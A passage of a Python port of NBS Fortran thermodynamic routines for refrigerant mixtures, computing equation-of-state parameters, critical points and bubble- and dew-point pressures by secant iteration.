BData.F[J][I]) * math.sqrt(BData.AP[J] * BData.AP[I])\n\t\t\t\tAMIX = AMIX + 2.0 * AJI[J][I]\n\n\t\tif IQ >= 1 :\n\t\t\tBData.DADT = 0.0\n\t\t\tBData.DBDT = 0.0\n\n\t\t\tfor I in range(1,BData.NC + 1): \t#DO 140 I = 1,NC\n\t\t\t\tDA[I][I] = BData.A[1][I-1] + 2.0 * BData.A[2][I-1] * T\n\t\t\t\tDAJI[I][I] = AJI[I][I] * DA[I][I]\n\t\t\t\tBData.DADT = BData.DADT + DAJI[I][I]\n\t\t\t\tBData.DBDT = BData.DBDT + X[I] * (BData.B[1][I-1] + 2.0 * BData.B[2][I-1] * T)\n\t\t\t\t\n\t\t\t\tfor J in range(1, (I - 1) + 1):\t#DO 140 J = 1,I - 1\n\t\t\t\t\tDA[J][I] = 0.5 * (BData.A[1][J-1] + BData.A[1][I-1] ) + (BData.A[2][J-1] + BData.A[2][I-1] ) * T\n\t\t\t\t\tDAJI[J][I] = AJI[J][I] * DA[J][I]\n\t\t\t\t\tBData.DADT = BData.DADT + 2.0 * DAJI[J][I]\n\n\t\t\tif IQ >= 2 :\n\t\t\t\tBData.D2ADT = 0.0\n\t\t\t\tBData.D2BDT = 0.0\n\n\t\t\t\tfor I in range(1,BData.NC + 1):\t#DO 160 I = 1,NC\n\t\t\t\t\tBData.CP[I] = BData.C[0][I-1] + (BData.C[1][I-1] + BData.C[2][I-1] * T) * T\n\n\t\t\t\t\tBData.D2BDT = BData.D2BDT + 2.0 * X[I] * BData.B[2][I-1]\n\t\t\t\t\tBData.D2ADT = BData.D2ADT + DAJI[I][I] * DA[I][I] + 2.0 * AJI[I][I] * BData.A[2][I-1]\n\n\t\t\t\t\tfor J in range(1, (I - 1) + 1): #DO 160 J = 1,I - 1\n\t\t\t\t\t\tBData.D2ADT = BData.D2ADT + 2.0 * (DAJI[J][I] * DA[J][I] + AJI[J][I] * (BData.A[2][J-1] + BData.A[2][I-1]))\n\n\t\t\tif IQ <= 3 :\n\t\t\t\tif T <= 0:\n\t\t\t\t\tprint (\"\\nespar : bad input parameter, T <= 0, T=\",T)\n\t\t\t\t\tprint ('Application terminated in python\\n')\n\t\t\t\t\tsys.exit\t#('1030') to show sorce of error\n\t\t\t\t\n\t\t\t\tfor I in range(1,BData.NC + 1):\t#DO 180 I = 1,NC\n\t\t\t\t\t\n\t\t\t\t\tBData.HP[I] = (BData.C[0][I-1] + (0.5 * BData.C[1][I-1] + BData.C[2][I-1] / 3.0 * T) * T) * T\n\t\t\t\t\tBData.SP[I] = (BData.C[0][I-1] - BData.R) * math.log(T / BData.TREF[I]) \\\n\t\t\t\t\t\t + BData.C[1][I-1] * (T - BData.TREF[I])\t\t\\\n\t\t\t\t\t\t + 0.5 * BData.C[2][I-1] * (T * T - (BData.TREF[I]**2))\n\n\t\treturn [AMIX, BMIX ]\n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef critx (self, X, TTC): #, TTC, PC, VC\n\t\t#\t SUBROUTINE CRITX (X,TTC,PC,VC)\n\t\t#\n\t\t# DEVELOPED BY MARK MCLINDEN AND GRAHAM MORRISON AT THE\n\t\t# NATIONAL BUREAU OF STANDARDS UNDER FUNDING FROM THE ELECTRIC\n\t\t# POWER RESEARCH INSTITUTE AND NBS.\n\t\t#\n\t\t# THIS ROUTINE FINDS THE CRITICAL POINT PREDICTED BY THE\n\t\t# EQUATION OF STATE. 
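# --- editor's sketch (hypothetical helper, not part of the original file) ---
# The T <= 0 guard in espar above ends with a bare `sys.exit` (no call
# parentheses). That is only an attribute lookup: nothing is raised and
# execution falls through after the prints. The call form actually stops:
def check_temperature(T):
    if T <= 0:
        print("\nespar : bad input parameter, T <= 0, T=", T)
        sys.exit(1)  # sys.exit must be *called* to raise SystemExit
# --- end sketch ---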
FOR A MIXTURE THE CRITICAL POINT IS\n\t\t# THAT OF A PSEUDO-PURE COMPONENT HAVING THE SAME 'A' AND\n\t\t# 'B' PARAMETERS AS THE MIXTURE; IN GENERAL, SUCH A PSEUDO-\n\t\t# PURE CRITICAL POINT WILL BE BELOW THE ACTUAL MIXTURE\n\t\t# CRITICAL POINT.\n\t\t#\n\t\t# INPUTS:\n\t\t# X - MIXTURE COMPOSITION (MOL FRAC)\n\t\t# TTC - INITIAL GUESS FOR THE CRITICAL TEMPERATURE (K)\n\t\t#\n\t\t# OUTPUTS:\n\t\t# TTC - CRITICAL TEMPERATURE (K)\n\t\t# PC - CRITICAL PRESSURE (KPA)\n\t\t# VC - CRITICAL VOLUME (M**3/KMOL)\n\t\t#\n\t\t# OTHER SUBROUTINE REFERENCED:\n\t\t# ESPAR - CALCULATION OF EQUATION OF STATE PARAMETERS\n\t\t#\n\t\t#\t COMMON /RDATA4/ R\n\t\t\n\t\t#-- Common REF group ---------------------------------\n\t\tTC = [0.0] * (3+1)\n\t\tFTC= [0.0] * (2+1)\n\t\t\n\t\tif (TTC <= 0.0):\n\t\t\tTTC = 300.0\n\n\t\tTC[1] = TTC\n\t\tJ = 1\n\t\t\n\t\tb_python_flag = True # python flag to exit loop\n\t\t\n\t\tfor IT in range (1, 20 +1 ):\t#DO 200 IT=1,20\n\t\t\t# [P4, P5] = self.espar [P1, P2, P3]\n\t\t\t[AC, BC] = self.espar (0, TC[J], X)\t\t#CALL ESPAR (0,TC(J),X,AC,BC)\n\t\t\t\n\t\t\tif (BC <= 0.0):\n\t\t\t\tTC[J] = 0.5 * TC[J]\n\t\t\t\tbreak\t#GOTO 200\n\t\t\t\n\t\t\tTCC = 0.2273291 * AC / (BData.R*BC)\n\t\t\tFTC[J] = TCC - TC[J]\n\t\n\t\t\tif ( abs( FTC[J] ) < 0.01):\n\t\t\t\tb_python_flag = False\t# exit flag\n\t\t\t\tbreak \t\t\t\t\t# GOTO 240\n\t\t\t\n\t\t\tif (J <= 1):\n\t\t\t\tJ = 2\n\t\t\t\tTC[2] = min (TCC, 1.5 * TC[1] )\n\t\t\telse:\n\t\t\t\tTC[3] = TC[2] - FTC[2] * ( TC[2] - TC[1] ) / ( FTC[2] - FTC[1] )\n\t\t\t\tTC[1] = TC[2]\n\t\t\t\tTC[2] = TC[3]\n\t\t\t\tFTC[1]= FTC[2]\n\n\t\t# end of loop 200 CONTINUE\n\t\t\n\t\tif b_python_flag :\t# if false goto 240\n\t\t\tprint ('*** CRITX DID NOT CONVERGE')\n\t\t\n\t\t# 240 TTC=TC[J]\n\t\tTTC = TC[J]\n\t\tPC = 0.02386944 * AC / BC**2\n\t\tVC = 3.006818 * BC\n\t\treturn [TTC, PC, VC]\n\t\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\t@staticmethod\n\tdef gibbs ( T,V,A,B) :\n\t\t'''\n\t\tstatement function for GIBBS free energy\n\t\tnote that since only differences of GIBBS are used, any terms which would cancel are omitted\n\t\t'''\t\n\t\treturn BData.R * T * ( - math.log(V) \\\n\t\t\t+ 0.25 * B * ((8.0 * V - 2.25 * B) * V \\\n\t\t\t+ 0.1875 * B * B) / ((V - 0.25 * B)**2) / (V - 0.25 * B)) \\\n\t\t\t+ A / B * math.log(V / (V + B)) - A / (V + B)\n\t\t\t\t\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . 
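# --- editor's sketch (generalized, not part of the original file) ---
# bublt below finds the saturation pressure by driving
# f(P) = GIBBS(liquid) - GIBBS(vapor) to zero with secant steps on ln(P).
# A stripped-down version of that iteration for any callable f(P):
def secant_log_p(f, p1, p2, tol=1.0E-7, itmax=20):
    l1, l2 = math.log(p1), math.log(p2)
    f1, f2 = f(p1), f(p2)
    for _ in range(itmax):
        dfdl = (f2 - f1) / (l2 - l1)
        if dfdl == 0.0 or abs(f2 / (l2 * dfdl)) < tol:
            break  # same convergence test bublt applies to FP and PL
        l1, f1 = l2, f2
        l2 = l2 - f2 / dfdl
        f2 = f(math.exp(l2))
    return math.exp(l2)
# (Aside: the over-critical diagnostic in bublt prints .099*loc_TC although
# the guard itself tests 0.99*loc_TC, and "giiven" is a typo for "given".)
# --- end sketch ---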
\n\tdef bublt (self, T,XL,XV,LBUB): \n\t\t#\tSUBROUTINE BUBLT (P1, P2, P3 , P4, P5, P6, P7, P8)\n\t\t#===============if LBUB is true XL give ,return XV, XL no effect\n\t\t# [\tXL, XV, P, VL, VV, LCRIT] = bublt ( T, XL, XV, LBUB )\n\t\t# [\tP2,to P6, P8] = bublt (P1, P2, P3 , P7 )\n\t\t# [\t_, P3 to P6, P8] = bublt (P1, P2, P3 , True )\n\t\t# [\tP2, _ ,P4, P5, P6, P8] = bublt (P1, P2, P3 , False )\n\t\t#======================\n\t\t# SUBROUTINE BUBLT (T ,XL, XV, P, VL, VV, LBUB, LCRIT)\n\t\t#\n\t\t# GIVEN TEMPERATURE AND COMPOSITION OF ONE PHASE THIS ROUTINE\n\t\t# CALCULATES THE SATURATION PRESSURE, THE COMPOSITION OF THE OTHER\n\t\t# PHASE AND THE LIQUID AND VAPOR SPECifIC VOLUMES.\n\t\t#\n\t\t# INPUTS:\n\t\t# T - TEMPERATURE (K)\n\t\t# ONLY ONE OF: XL - LIQUID COMPOSITION (MOLE FRACTION)\n\t\t# OR: XV - VAPOR COMPOSITION (MOLE FRACTION)\n\t\t# LBUB - LOGICAL VARIABLE\n\t\t# if LBUB = True LIQUID COMPOSITION IS GIVEN (COMPUTE\n\t\t# BUBBLE POINT)\n\t\t# if LBUB = False VAPOR COMPOSITION IS GIVEN (COMPUTE\n\t\t# DEW POINT)\n\t\t#\n\t\t# OUTPUTS:\n\t\t# XL OR XV - COMPOSITION OF CALCULATED PHASE\n\t\t# P - SATURATION PRESSURE (kPa)\n\t\t# VL - LIQUID VOLUME (M**3/ KG MOL)\n\t\t# VV - VAPOR VOLUME (M**3/KG MOL)\n\t\t# LCRIT - ERROR FLAG; if LCRIT = True THE INPUT TEMPERATURE\n\t\t# EXCEEDS THE CRITICAL TEMPERATURE OF THE MIXTURE AND\n\t\t# NO CALCULATIONS ARE DONE\n\t\t#\n\t\t# OTHER SUBROUTINES REFERENCED:\n\t\t# VIT - ITERATION FOR SPECifIC VOLUME\n\t\t# PLIMIT - DETERMINES INITIAL BOUNDS ON PRESSURE AND VOLUME\n\t\t# espar - COMPUTATION OF EQUATION OF STATE PARAMETERS\n\t\t#\n\t\t# GENERAL NOMENCLATURE FOR FIRST LETTER OF VARIABLE NAMES\n\t\t# A,B - EQUATION OF STATE PARAMETERS\n\t\t# BData.F - MIXING PARAMETER\n\t\t# T - TEMPERATURE\n\t\t# P - PRESSURE\n\t\t# V - SPECifIC VOLUME\n\t\t# X - COMPOSITION\n\t\t# gibbs - GIBBS FREE ENERGY\n\t\t# U - CHEMICAL POTENTIAL\n\t\t# Y - COMBINATION OF VARIABLES USED IN EQUATION OF STATE\n\t\t# TOL - CONVERGENCE TOLERANCE FOR ITERATION LOOPS\n\t\t# I,J - INDEX VARIABLES FOR ITERATION AND DO LOOPS\n\t\t# L - LOGICAL VARIABLES SUCH AS NON - CONVERGENCE FLAGS\n\t\t#\n\t\t# GENERAL NOMENCLATURE FOR SECOND OR THIRD LETTER OF VARIABLES\n\t\t# L - LIQUID PHASE\n\t\t# V - VAPOR PHASE\n\t\t# 1 - PARENT PHASE (PHASE WITH SPECifIED COMPOSITION)\n\t\t# 2 - INCIPIENT PHASE\n\t\t#\n\t\t#\n\t\t#IMPLICIT REAL (A - H,O - Z)\n\t\t#LOGICAL LBUB,LCRIT,LV1CON,LV2CON,LXCON,LXPOS,LXNEG,LPPOS,LPNEG,LPPCON\n\t\t#COMMON / NCOMP / BData.NC\n\t\t#COMMON / ESPAR1 / BData.AP(5),BData.BP(5),BData.F(5,5),BData.DADT,BData.DBDT,BData.D2ADT,D2BDT\n\t\t#COMMON / RDATA4 / R\n\t\t#COMMON / TOL / TOLR,ITMAX,LUP\n\t\t\n\t\tPP = [0.0] * (3 + 1)\t#PP(3),FP(2),XL(5),XV(5)\n\t\tFP = [0.0] * (2 + 1)\n\t\t#input XL = [0.0] * (5 + 1)\n\t\t#input XV = [0.0] * (5 + 1)\n\n\t\tX1 = [0.0] * (5 + 1)\t# X1(5),X2(5),X2C(5),XX2(5)\n\t\tX2 = [0.0] * (5 + 1)\n\t\tX2C = [0.0] * (5 + 1)\n\t\tXX2 = [0.0] * (5 + 1)\n\n\t\tZ = [0.0] * (5 + 1)\t# Z(5),FX2(5),U1(5),U2(5),PL(3)\n\t\tFX2 = [0.0] * (5 + 1)\n\t\tU1 = [0.0] * (5 + 1)\n\t\tU2 = [0.0] * (5 + 1)\n\t\tPL = [0.0] * (3 + 1)\n\t\t\n\t\tLCRIT = False\n\t\t\n\t\t#\n\t\t# COMPUTE PURE COMPONENT E.S. COEFFICIENTS, THE MIXING PARAMETER,\n\t\t# AND THE E.S. 
COEFFICIENTS FOR PHASE 1\n\t\t\n\t\tif LBUB:\n\t\t\tX1 = XL[:]\n\t\t\tXV = XL[:]\n\t\t\t#for I in range(1,BData.NC + 1):\n\t\t\t#\tX1[I] = XL[I]\n\t\t\t#\tXV[I] = XL[I]\n\t\telse:\n\t\t\tX1 = XV[:]\n\t\t\tXL = XV[:]\t\t\n\t\t\t#for I in range(1,BData.NC + 1):\n\t\t\t#\tX1[I] = XV[I]\n\t\t\t#\tXL[I] = XV[I]\n\n\t\t[A1, B1] = self.espar (0,T,X1)\t#CALL espar (0,T,X1,A1,B1)\n\t\t\n\t\t#\n\t\t# DETERMINE if INPUT TEMPERATURE EXCEEDS CRITICAL POINT;\n\t\t# if SO, SET ERROR FLAG AND RETURN\n\t\t#\n\t\tloc_TC = A1 / (B1 * 4.398909 * BData.R)\n\t\n\t\tif T > 0.99 * loc_TC :\n\t\t\tLCRIT = True\n\t\t\tprint ('bublt : critical point of pure or pseudo - pure material exceeded in bublt')\n\t\t\tprint (' in python, bad entry data, input temperature is more than critical point')\n\t\t\tprint (' input temp=' + str(T) + \"K Critical point (with the given X) \" + str(0.99*loc_TC) + \" K\")\n\t\t\tprint (' input X ' , X1)\n\t\t\tprint ('Application terminated in python\\n')\n\t\t\tsys.exit('1000')\n\t\t\treturn [XL, XV, 0.0, 0.0, 0.0, LCRIT]\n\n\t\t#\n\t\t# ENTER ITERATION FOR PSEUDO - PURE COMPONENT. THIS ITERATION\n\t\t# YIELDS THE FINAL RESULT FOR A PURE COMPONENT AND PROVIDES\n\t\t# A STARTING GUESS FOR THE PRESSURE OF A MIXTURE\n\t\t#\n\t\t# CALL SUBROUTINE TO DETERMINE THE UPPER AND LOWER BOUNDS\n\t\t# ON PRESSURE FOR WHICH THERE ARE BOTH LIQUID AND VAPOR\n\t\t# SOLUTIONS OF THE EQUATION OF STATE\n\t\t#\n\n\t\t[VLOW, VUP, PLOW, PUP] = self.plimit (T,A1,B1)\n\n\t\t# SET INITIAL GUESSES FOR PRESSURE NEAR THE UPPER AND\n\t\t# LOWER BOUNDS. if THE LOWER BOUND FOR PRESSURE IS NEGATIVE\n\t\t# RESET IT TO A SMALL POSITIVE VALUE.\n\n\t\tif PLOW <= 0.0:\n\t\t\tVLOW = 0.8 * B1\n\t\t\tPC = 0.1049995 * BData.R * loc_TC / B1\n\t\t\tPLOW = (1.0E-12) * PC\n\t\t\tPP[1] = PLOW\n\t\telse:\n\t\t\tPP[1] = PLOW + 0.0001 * (PUP - PLOW)\n\n\t\tPP[2] = PUP - 0.0001 * (PUP - PLOW)\n\t\tPL[1] = math.log(PP[1])\n\t\tPL[2] = math.log(PP[2])\n\t\t\n\t\tVL = 0.9 * VLOW\n\t\tVV = 1.1 * VUP\n\t\tJ = 1\n\n\t\tLPPOS = False\n\t\tLPNEG = False\n\t\t#LPPCON = False # modified in Python, to work around the Fortran GOTO\n\t\tLPPCON = True \n\n\t\t#\n\t\t# STARTING WITH INITIAL VALUES OF PRESSURE CLOSE TO THE UPPER\n\t\t# AND LOWER BOUNDS (FOUND BY SUBROUTINE PLIMIT) ITERATE ON\n\t\t# LOG (P) UNTIL THE GIBBS FREE ENERGIES OF BOTH PHASES ARE EQUAL.\n\t\t# A COMBINATION OF SECANT AND REGULI - FALSI METHODS IS USED\n\t\t# FOR THE ITERATION.\n\t\t\n\t\tPNEG = 0.0 # In Python only, so PNEG is always bound \n\t\tfor IT in range (1, BData.ITMAX + 1):\t#DO 400 IT = 1,ITMAX\n\t\t\tLV1CON = False\n\t\t\tLV2CON = False\n\n\t\t\t#[P5, P7] = self.vit (P1, P2, P3, P4, P5, P6)\n\t\t\t[VL, LV1CON] = self.vit (T, PP[J], A1, B1, VL, True) \t\t# CALL VIT (T, PP[J], A1, B1, VL, True, LV1CON)\n\t\t\t[VV, LV2CON] = self.vit (T, PP[J], A1, B1, VV, False)\t\t# CALL VIT (T, PP[J], A1, B1, VV, False, LV2CON)\n\n\t\t\tGL = self.gibbs(T, VL, A1, B1)\n\t\t\tGV = self.gibbs(T, VV, A1, B1)\n\t\t\tFP[J] = GL - GV\n\n\t\t\tif FP[J] < 0.0:\n\t\t\t\tLPNEG = True\n\t\t\t\tFPNEG = FP[J]\n\t\t\t\tPNEG = PL[J]\n\t\t\t\tPPOS = 0.0 # in python only\n\t\t\telse:\n\t\t\t\tLPPOS = True\n\t\t\t\tFPPOS = FP[J]\n\t\t\t\tPPOS = PL[J]\n\n\t\t\tif IT <= 1 :\n\t\t\t\tJ = 2\n\t\t\telse:\n\t\t\t\tDGDPL = (FP[2] - FP[1]) / (PL[2] - PL[1])\n\t\t\t\tif (DGDPL == 0.0) or \\\n\t\t\t\t\t(abs(FP[J] / (PL[J] * DGDPL)) < BData.TOLR):\t#GOTO 440\n\t\t\t\t\t#Python modification\n\t\t\t\t\tLPPCON = False\n\t\t\t\t\tbreak\n\t\t\t\t\t\n\t\t\t\t# NEXT GUESS FOR LOG (P) GIVEN BY SECANT METHOD\n\t\t\t\tPL[3] = PL[2] - FP[2] / 
DGDPL\n\t\t\t\t\t\n\t\t\t\t# IF NEXT GUESS FOR LOG (P) IS FURTHER FROM SOLUTION THAN\n\t\t\t\t# PREVIOUS BEST GUESS, USE REGULI - FALSI METHOD FOR NEXT GUESS\n\t\t\t\tif ( ( PL[3] > max(PNEG, PPOS) \\\n\t\t\t\t\tor \tPL[3] < min(PNEG, PPOS) ) and LPNEG and LPPOS ) :\n\n\t\t\t\t\tPL[3] = PPOS - FPPOS * (PPOS - PNEG) / (FPPOS - FPNEG)\n\n\t\t\t\tPL[1] = PL[2]\n\t\t\t\tPL[2] = PL[3]\n\t\t\t\tFP[1] = FP[2]\n\t\t\t\tPP[2] = math.exp(PL[2])\n\t\t\t\t\n\t\t\t\t\t\n\t\t\t# 400 CONTINUE\n\t\t\t\n\t\t\t# Delete this comment if ITERATION HAS NOT CONVERGED, SET ERROR FLAG.\n\t\t\t# ----deleted by python editorLPPCON = 1\t#True\n\t\t\t\n\t\t\t#\n\t\t\t# END OF PSEUDO - PURE COMPONENT ITERATION\n\t\t\t#\n\t\t\t# FOR A PURE COMPONENT THE ABOVE ITERATION GIVES THE FINAL RESULT\n\t\t\t#\t\n\t\tif BData.NC == 1:\t# 440 if (BData.NC == 1) :\n\t\t\tif LV1CON : print (BData.LUP,'bublt :volume iteration for parent phase did not converge')\n\t\t\tif LV2CON : print (BData.LUP,'bublt :volume iteration for incipient phase did not converge')\n\t\t\tif LPPCON : print (BData.LUP,'bublt :pure material pressure iteration in bublt did not converge')\n\t\t\tP = PP[J]\n\t\t\treturn [XL, XV, P, VL, VV, LCRIT]\n\t\t#\n\t\t# ENTER ITERATION FOR MIXTURE\n\t\t#\n\t\t# THE MIXTURE ITERATION CONSISTS OF TWO CONCENTRIC ITERATION\n\t\t# LOOPS WHICH VARY THE SATURATION PRESSURE OF THE MIXTURE AND THE\n\t\t# COMPOSITION OF THE COMPUTED PHASE TO GIVE EQUAL CHEMICAL\n\t\t# POTENTIALS FOR EACH OF THE COMPONENTS BETWEEN THE TWO PHASES.\n\t\t# THE INITIAL GUESS FOR THE PRESSURE IS GIVEN BY THE PSEUDO - PURE\n\t\t# ITERATION ABOVE; THE INITIAL GUESS FOR COMPOSITION IS THAT X2 = X1.\n\t\t#\n\t\t# ASSIGN INITIAL VALUES OF LIQUID AND VAPOR VOLUMES FROM ABOVE\n\t\t# ITERATION TO PHASE 1 AND 2 VOLUMES.\n\t\t#\n\t\tif LBUB :\n\t\t\tV1 = VL\n\t\t\tV2 = VV\n\t\telse:\n\t\t\tV1 = VV\n\t\t\tV2 = VL\n\n\t\tPP[1] = PP[J]\n\n\t\t#\n\t\t# BEGIN ITERATION FOR SATURATION PRESSURE OF MIXTURE\n\t\t#\n\t\tJ = 1\n\t\tX2C = X1[:]\n\t\t#for I in range(1, BData.NC +1):\t# DO 500 I = 1,BData.NC\n\t\t#\tX2C[I] = X1[I]\n\n\t\tLPNEG = False\n\t\tLPPOS = False\n\t\t\n\t\tb_pyth_exit_inner = False\n\t\tfor ITP in range (1, BData.ITMAX + 1): # DO 800 ITP = 1,ITMAX\n\t\t\tXX2 = X2C[:]\n\t\t\t#for I in range (1, BData.NC + 1): # DO 520 I = 1,BData.NC\n\t\t\t#\tXX2[I] = X2C[I]\n\n\t\t\tLXCON = False\n\t\t\tLV1CON = False\n\t\t\t\n\t\t\t#[P5, P7] = self.vit (P1, P2, P3, P4, P5, P6)\n\t\t\t[V1, LV1CON] = self.vit (T,PP[J],A1,B1,V1,LBUB)\t#CALL VIT (T,PP(J),A1,B1,V1,LBUB,LV1CON)\n\n\t\t\t#\n\t\t\t# if VOLUME ITERATION HAS NOT CONVERGED, TRY A NEW PRESSURE AND\n\t\t\t# RETURN TO THE BEGINNING OF THE ITERATION\n\t\t\t#\n\t\t\tif (LV1CON or LXCON) :\n\t\t\t\tPP[2] = 0.5 * (PP[1] + PP[2])\n\t\t\t\tbreak # GOTO 800\n\n\t\t\t# COMPUTE CHEMICAL POTENTIALS FOR PHASE 1\n\t\t\tfor I in range (1, BData.NC + 1): #DO 540 I = 1,BData.NC\n\t\t\t\tU1[I] = self.U_Func (T,X1,I,V1,A1,B1,BData.AP,BData.BP,BData.F)\n\n\t\t\t#\n\t\t\t# ENTER INNER ITERATION LOOP (FOR COMPOSITION OF PHASE 2)\n\t\t\t#\n\t\t\tLXNEG = False\n\t\t\tLXPOS = False\n\t\t\t\n\t\t\tC = 0.0 # prevent var is not found\n\t\t\tLXCON = True # add by python\n\t\t\tb_pyth_exit_outer = False\n\t\t\tfor IT in range (1, BData.ITMAX + 1):\t# DO 600 IT = 1,ITMAX\n\t\t\t\tLV2CON = False\n\n\t\t\t\t# COMPUTE EQUATION OF STATE COEFFICIENTS FOR PHASE 2\n\t\t\t\t\n\t\t\t\t[A2, B2] = self.espar (0,T,XX2) \t#CALL espar (0,T,XX2, A2, B2)\n\t\t\t\t#[P5, P7] = self.vit (P1, P2, P3, P4, P5, P6)\n\t\t\t\t[V2, LV2CON] = self.vit (T,PP[J], A2, 
B2,V2, not LBUB)\t#CALL VIT (T,PP[J], A2, B2,V2,.NOT.LBUB,LV2CON)\n\n\t\t\t\t#\n\t\t\t\t# if VOLUME ITERATION HAS NOT CONVERGED, TRY A NEW PRESSURE\n\t\t\t\t# AND RETURN TO THE START OF THE PRESSURE ITERATION.\n\t\t\t\t#\n\t\t\t\tif LV2CON :\n\t\t\t\t\tPP[2] = 0.5 * (PP[1] + PP[2])\n\t\t\t\t\tb_pyth_exit_outer = True\n\t\t\t\t\tbreak\t# GOTO 800\n\n\t\t\t\t# COMPUTE CHEMICAL POTENTIALS OF PHASE 2\n\t\t\t\tfor I in range (1, BData.NC + 1): #DO 560 I = 1,BData.NC\n\t\t\t\t\tU2[I] = self.U_Func(T,XX2,I,V2, A2, B2,BData.AP,BData.BP,BData.F)\n\n\t\t\t\t#\n\t\t\t\t# CALCULATE THE COMPOSITION OF PHASE 2 FROM THE COMPOSITION\n\t\t\t\t# OF PHASE 1 AND THE CHEMICAL POTENTIALS. THE INNER ITERATION\n\t\t\t\t# LOOP HAS CONVERGED WHEN THE CALCULATED COMPOSITION EQUALS\n\t\t\t\t# (WITHIN A CONVERGENCE TOLERANCE) THE GUESSED VALUE OF X2.\n\t\t\t\t#\n\t\t\t\tFXSUM = 0.0\n\t\t\t\tC = 0.0\n\t\t\t\tfor I in range (1, BData.NC + 1): \t#DO 580 I = 1,BData.NC\n\t\t\t\t\tZ[I] = X1[I] * math.exp(U1[I] - U2[I])\n\t\t\t\t\tC = C + Z[I]\n\n\t\t\t\tfor I in range (1, BData.NC + 1): \t# DO 584 I = 1,BData.NC\n\t\t\t\t\tX2C[I] = Z[I] / C\n\t\t\t\t\tFX2[I] = X2C[I] - XX2[I]\n\t\t\t\t\tXX2[I] = X2C[I]\n\t\t\t\t\tFXSUM = FXSUM + abs(FX2[I])\n\t\t\t\t\n\t\t\t\tif (FXSUM < BData.NC * BData.TOLR) :\n\t\t\t\t\t# break is done exit 800 loop\n\t\t\t\t\tLXCON = False # add by python\n\t\t\t\t\tbreak\t#GOTO 640\n\t\t\t\t#End of loop ---- 600 CONTINUE\n\n\t\t\tif b_pyth_exit_outer: break\n\t\t\t# deleted by python editor LXCON = True\n\t\t\t#\n\t\t\t# END OF ITERATION LOOP FOR PHASE 2 COMPOSITION\n\t\t\t#\n\n\t\t\tFP[J] = 1.0 - C\t# Fortran location 640\n\n\t\t\t#\n\t\t\t# OUTER (PRESSURE) ITERATION HAS CONVERGED WHEN C = 1.000\n\t\t\t# (I.E. WHEN THE CHEMICAL POTENTIALS OF EACH COMPONENT ARE\n\t\t\t# THE SAME IN BOTH PHASES).\n\t\t\t#\n\n\t\t\tif (abs(FP[1]) < 100.0 * BData.TOLR):\n\t\t\t\tb_pyth_exit_inner = True\n\t\t\t\t# break is done exit 800 loop\n\t\t\t\tbreak\t#GOTO 840\n\n\t\t\t#\n\t\t\t# PROVIDED THAT THE X2 ITERATION HAS CONVERGED FOR THE CURRENT\n\t\t\t# GUESS OF PRESSURE, UPDATE THE POSITIVE AND NEGATIVE\n\t\t\t# BOUNDS FOR USE WITH THE REGULI - FALSI METHOD.\n\t\t\t#\n\t\t\tif not LXCON:\n\t\t\t\tif (FP[J] < 0.0):\n\t\t\t\t\tLPNEG = True\n\t\t\t\t\tFPNEG = FP[J]\n\t\t\t\t\tPNEG = PP[J]\n\t\t\t\telse:\n\t\t\t\t\tLPPOS = True\n\t\t\t\t\tFPPOS = FP[J]\n\t\t\t\t\tPPOS = PP[J]\n\n\t\t\t#\n\t\t\t# COMPUTE NEW GUESS FOR SATURATION PRESSURE.\n\t\t\t#\n\t\t\tif (ITP <= 2 or J == 1 or FP[1] == FP[2]) :\n\t\t\t\tPP[1] = PP[J]\n\t\t\t\tFP[1] = FP[J]\n\n\t\t\t\tif (LBUB) :\n\t\t\t\t\tPP[2] = PP[J] * C\n\t\t\t\telse :\n\t\t\t\t\tPP[2] = PP[J] / C\n\n\t\t\t\tJ = 2\n\t\t\telse :\n\t\t\t\tPP[3] = PP[2] - FP[2] * (PP[2] - PP[1]) / (FP[2] - FP[1])\n\n\t\t\t\tif ((PP[3] > max(PNEG,PPOS) or \\\n\t\t\t\t\t PP[3] < min(PNEG,PPOS) ) and LPNEG and LPPOS):\n\n\t\t\t\t\tPP[3] = PPOS - FPPOS * (PPOS - PNEG) / (FPPOS - FPNEG)\n\n\t\t\t\tPP[1] = PP[2]\n\t\t\t\tPP[2] = PP[3]\n\t\t\t\tFP[1] = FP[2]\n\t\t\t#- End of loop =========800 CONTINUE\n\t\t\n\t\t# location 800\n\t\tif not b_pyth_exit_inner:\n\t\t\tprint (BData.LUP, 'bublt : mixture pressure iteration in bublt did not converge')\n\n\t\tP = PP[J] # location 840\n\t\t#\n\t\t# ASSIGN RESULTS FOR PHASES 1 AND 2 TO LIQUID AND VAPOR PHASES\n\t\t# DEPENDING ON WHETHER THE DEW OR BUBBLE POINT WAS CALCULATED.\n\t\t#\n\t\tif (LBUB) :\n\t\t\t#for I in range (1, BData.NC + 1): # DO 860 I = 1,BData.NC\n\t\t\t#\tXV[I] = XX2[I]\n\t\t\tXV = XX2 [:]\n\t\t\tVL = V1\n\t\t\tVV = V2\n\t\telse :\n\t\t\t#for I in 
range (1, BData.NC + 1): # DO 880 I = 1,BData.NC\n\t\t\t#\tXL[I] = XX2[I]\n\t\t\tXL = XX2 [:]\n\t\t\tVL = V2\n\t\t\tVV = V1\n\n\t\t#\n\t\t# PRINT WARNING MESSAGES FOR ANY CASES OF NON - CONVERGENCE OCCURING\n\t\t# ON FINAL CALL TO EACH ITERATION AND RETURN.\n\t\t#\n\t\tif LV1CON : print (BData.LUP,'bublt : volume iteration for parent phase did not converge')\n\t\tif LV2CON : print (BData.LUP,'bublt : volume iteration for incipient phase did not converge')\n\t\tif LXCON : print (BData.LUP,'bublt : composition iteration in bublt did not converge')\n\n\t\treturn [ XL, XV, P, VL, VV, LCRIT] \n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef bublp (self, P, XL, XV, LBUB)\t:\t# T,VL,VV, LCRIT\n\t\t#\tSUBROUTINE BUBLP (P1, P2, P3, P4, P5, P6, P7, P8)\n\t\t# [P2, P3 ,P4, P5, P6, P8] = self.bublp (P1, P2, P3 , P7 )\n\t\t#\t SUBROUTINE BUBLP (P,XL,XV ,T,VL,VV, LBUB ,LCRIT)\n\t\t#\n\t\t# DEVELOPED BY MARK MCLINDEN AND GRAHAM MORRISON AT THE\n\t\t# NATIONAL BUREAU OF STANDARDS UNDER FUNDING FROM THE ELECTRIC\n\t\t# POWER RESEARCH INSTITUTE AND NBS.\n\t\t#\n\t\t# GIVEN PRESSURE AND COMPOSITION OF ONE PHASE THIS 